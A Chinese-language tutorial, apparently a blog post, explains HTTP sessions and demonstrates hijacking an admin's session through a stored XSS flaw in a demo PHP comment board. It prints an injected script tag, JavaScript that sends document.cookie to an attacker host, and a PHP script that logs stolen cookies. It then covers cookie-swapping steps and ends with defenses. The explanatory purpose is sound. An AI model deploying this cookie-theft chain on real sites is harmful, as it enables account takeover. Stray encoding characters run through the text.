|
在跨站腳本攻擊XSS中簡單介紹了XSS的原理及一個(gè)利用XSS盜取存在cookie中用戶名和密碼的小例子,有些同學(xué)看了后會(huì)說這有什么大不了的�����,哪里有人會(huì)明文往cookie里存用戶名和密碼�����。今天我們就介紹一種危害更大的XSS——session劫持�����。
神馬是session
想明白session劫持及其危害���,首先要搞清楚什么是session����,熟悉http的同學(xué)知道��,http是無狀態(tài)的�����,也就是客戶端向服務(wù)器請求完成后���,會(huì)斷開連接�����,下次同一個(gè)客戶端再次訪問服務(wù)器的時(shí)候�,服務(wù)器會(huì)把它當(dāng)作一個(gè)陌生的請求���,不會(huì)知道它曾經(jīng)來過�����,這里有它的印記����。
但是這樣的交互是非常麻煩的����,某個(gè)網(wǎng)站有很多theme,通過一套機(jī)制記在服務(wù)器中��,用戶訪問的時(shí)候從數(shù)據(jù)庫等地方讀取配置,返回給客戶端合適的themeHTML響應(yīng)����。因?yàn)閔ttp沒有狀態(tài),下次用戶再來的時(shí)候又讀取一遍數(shù)據(jù)庫配置��,每個(gè)用戶都要重復(fù)這個(gè)過程���,是不是很麻煩����。這時(shí)候我們希望有一個(gè)全局的變量存儲(chǔ)空間�,用來存放一些全站點(diǎn)都需要的并且不會(huì)變來變?nèi)ィ词棺円矝]什么)的數(shù)據(jù),這就是Application變量����。Application變量是站點(diǎn)的全局變量,只要服務(wù)器不宕機(jī)����,任何用戶在任何頁面在授權(quán)的情況下都可以訪問,進(jìn)行讀寫操作�。這樣一些theme、timezone等信息就可以在用戶第一次訪問的時(shí)候存放在Application內(nèi)����,再次訪問或者其它用戶訪問的時(shí)候可以直接去讀取����,方便了很多�。
然而�����,有時(shí)候我們希望服務(wù)器為我們每個(gè)單獨(dú)的web用戶開辟一塊兒私密空間�����,比如我們肯定不希望用戶訪問一個(gè)頁面就輸一次用戶名����、密碼,當(dāng)用戶第一次登錄成功后可以把登錄信息存放在服務(wù)器�����,下次來了直接比對就可以�。但是明顯大家不希望自己的用戶名和密碼能夠被所有的用戶訪問,所以服務(wù)器私密空間是需要的�。
but��,由于http的無狀態(tài)性即使服務(wù)器上有了每個(gè)用戶的私密空間���,但下次用戶訪問的時(shí)候,服務(wù)器仍然不知道用戶是張三�、李四還是王二麻子。這可怎么辦��,聰明的同學(xué)肯定想到了�,讓客戶端的請求告訴服務(wù)器我是王二麻子就行了。這樣服務(wù)器和客戶端就可以對話了���,不至于說了后句就忘了前句��。
問題在于客戶端怎么告訴服務(wù)器我是誰���。細(xì)心的同學(xué)會(huì)注意到cookie是http協(xié)議的一部分,會(huì)在http請求和http響應(yīng)中出現(xiàn)����,而客戶端和服務(wù)器有記憶的會(huì)話正是靠cookie實(shí)現(xiàn)的。拿登錄做例子���,會(huì)話過程是這樣的
登錄
1. 客戶端發(fā)送登錄請求
2. 服務(wù)器接收請求�����,驗(yàn)證登錄�����,成功后為此web用戶開辟一個(gè)私密空間���,存放登錄信息
3. 服務(wù)器為這個(gè)私密空間編號(hào)��,類似于PHPSESSID=rcmjnke6er5pnvf3qof0lclca7這樣的一個(gè)鍵值對,不同的語言生成的鍵名和值的規(guī)則不同����,但是都本著兩個(gè)原則:第一,value必須唯一���,畢竟一個(gè)站點(diǎn)可能同時(shí)有數(shù)百萬甚至更多用戶在訪問����,不能讓兩個(gè)用戶的表示一樣��;第二:生成的value必須是不可推測的��,否則別有用心用戶就可以根據(jù)自己的表示信息推斷出別人的,然后偽造別人登錄信息訪問站點(diǎn)(這正是session劫持)���。
4. 服務(wù)器把這個(gè)鍵值對寫入http響應(yīng)中傳給客戶端
5. 客戶端接收響應(yīng)�,關(guān)閉連接
登錄成功�����,用戶訪問其他頁面
1. 客戶端發(fā)送登錄請求(服務(wù)器寫到cookie中的用戶標(biāo)識(shí)信息也被發(fā)送)
2. 服務(wù)器讀取http請求中的cookie信息��,根據(jù)標(biāo)識(shí)信息查找對應(yīng)私密空間�,讀取用戶信息
3. 服務(wù)器生成特定響應(yīng),發(fā)送給客戶端
4. 客戶端接收響應(yīng)�,關(guān)閉連接
這個(gè)過程是不是很像是一個(gè)會(huì)話?這樣第一次來了給個(gè)標(biāo)簽����,下次憑此標(biāo)簽交流的機(jī)制就是session,當(dāng)然session還包含其失效機(jī)制等����。
session劫持
服務(wù)器生成的用以標(biāo)識(shí)客戶信息的cookie一般被稱為sessionId,而通過一些手段獲取其它用戶sessionId的攻擊就叫session劫持����。
說的這么恐怖���,那么被別人知道了我的sessionId后會(huì)有什么危險(xiǎn)呢?通過上面交互過程可以看出來服務(wù)器是靠sessionId識(shí)別客戶端是張三�、李四還是王二麻子的,當(dāng)其它用戶獲知了你的sessionId后����,在其有效期內(nèi)就可以憑此sessionId欺騙服務(wù)器,獲取你的身份登錄使用網(wǎng)站�����。
XSS劫持session
還是使用跨站腳本攻擊XSS中留言板的XSS漏洞����,添加一個(gè)登錄成功的首頁��,包含留言板頁面鏈接�����,管理員有其它權(quán)限��,登錄失敗返回登錄頁�����。
home.php
<!DOCTYPE html>
<html>
<head>
<title>Home</title>
<?php include('/components/headerinclude.php');?>
</head>
<body>
<a href="list.php">Comments</a>
<?php
use \entity\authority as au;
include 'entity\user.php';
if(isset($_POST['username'])){
$user=new au\User();
$user->username=$_POST['username'];
$user->password=md5($_POST['password']);
if($user->username=='Byron'){
$user->role='admin';
}else{
$user->role='normal';
}
$_SESSION['user']=json_encode($user);
}
if(!isset($_SESSION['user'])){
echo '<script>';
echo 'window.location.href="index.php"';
echo '</script>';
}else{
$me=json_decode($_SESSION['user']);
echo '<br/>Hello '.$me->username.'!<br/>';
if($me->role=='admin'){
echo "Your are an Administrator, you can do anything.";
}
}
?>
</body>
</html>
當(dāng)我們以管理員身份登錄后界面是這樣的
當(dāng)沒有管理員權(quán)限的惡意用戶登錄并訪問留言板的時(shí)候,利用XSS漏洞注入這樣代碼
看看壞蛋做了什么
<script type="text/javascript" src="http:///hack.js"></script>這條語句利用script的src跨域請求壞蛋自己的腳本
http:///hack.js
var c=document.cookie;
var script =document.createElement('script');
script.src='http:///index.php?c='+c;
document.body.appendChild(script);
腳本中創(chuàng)建了一個(gè)script標(biāo)簽����,利用jsonp連帶這當(dāng)前用戶的cookie向'http:///index.php發(fā)送了http請求
http:///index.php
<?php
if(!empty($_GET['c'])){
$cookie=$_GET['c'];
try{
$path=$_SERVER["DOCUMENT_ROOT"].'/session.txt';
$fp=fopen($path,'a');
flock($fp, LOCK_EX);
fwrite($fp, "$cookie\r\n");
flock($fp, LOCK_UN);
fclose($fp);
}catch(Exception $e){
}
}
?>
原來壞蛋通過XSS把sessionId記到了自己磁盤
如何偽造管理員登錄
這樣如果在壞蛋利用XSS注入劫持sessionId的腳本后管理員登錄并訪問留言板頁面,壞蛋就會(huì)得到管理員的sessionId����,在其有效期內(nèi)壞蛋可以這么做
1. 利用自己賬號(hào)登錄系統(tǒng),等待管理員訪問被攻擊頁面����,獲取其sessionId
比如我得到管理員sessionId PHPSESSID=93jqhkal21kn6lg68uubvd1s37
2. 通過客戶端修改sessionId
自己登錄界面
修改cookie
3. 刷新頁面,騙過服務(wù)器����,自己成了管理員
4. 不堪設(shè)想。�����。�。
如何防范
這種session劫持主要靠XSS漏洞和客戶端獲取sessionId完成,一次防范分兩步
1. 過濾用戶輸入,防止XSS漏洞
2. 設(shè)置sessionId的cookie為HttpOnly�,使客戶端無法獲取
|
